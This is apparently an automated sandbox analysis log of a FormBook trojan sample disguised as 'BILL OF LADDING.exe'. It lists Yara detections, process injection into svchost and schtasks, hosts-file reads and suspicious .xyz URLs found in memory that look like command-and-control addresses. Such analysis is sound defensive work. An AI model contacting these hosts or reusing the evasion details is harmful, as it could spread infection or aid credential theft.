        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:54:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:54:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:54:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://emailverification.info/
        Source: schtasks.exe, 00000004.00000002.885346022.0000000003CC8000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.00000000040C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJM
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885097332.0000000000A51000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.booosted.xyz
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885097332.0000000000A51000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.booosted.xyz/12c7/
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003DA4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.givingaway123.net/1juc/?jnQX=Sd7Ig8sUf85GUDOd
        Source: schtasks.exe, 00000004.00000002.885978365.0000000061EB2000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: schtasks.exe, 00000004.00000002.885346022.0000000003680000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003A80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=stocksm.fun
        Source: schtasks.exe, 00000004.00000002.885346022.0000000003680000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003A80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
        Source: 6222f67M.4.drString found in binary or memory: https://www.google.com/favicon.ico
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.icann.org/resources/pages/non-response-2014-01-29-en
        Source: dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.00000000035CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO6

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: BILL OF LADDING.exe
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
        Source: BILL OF LADDING.exe, 00000000.00000003.362767551.0000000003D10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BILL OF LADDING.exe
        Source: BILL OF LADDING.exe, 00000000.00000003.362651620.00000000032FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BILL OF LADDING.exe
        Source: BILL OF LADDING.exe, 00000000.00000002.363338363.0000000000A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs BILL OF LADDING.exe
        Source: BILL OF LADDING.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@15/12
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeFile created: C:\Users\user\AppData\Local\Temp\harrowmentJump to behavior
        Source: BILL OF LADDING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: schtasks.exe, 00000004.00000002.885956494.0000000061E99000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: BILL OF LADDING.exeReversingLabs: Detection: 34%
        Source: BILL OF LADDING.exeVirustotal: Detection: 43%
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeFile read: C:\Users\user\Desktop\BILL OF LADDING.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\BILL OF LADDING.exe "C:\Users\user\Desktop\BILL OF LADDING.exe"
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BILL OF LADDING.exe"
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BILL OF LADDING.exe"Jump to behavior
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\BILL OF LADDING.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mozglue.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dhcpcsvc.dllJump to behavior
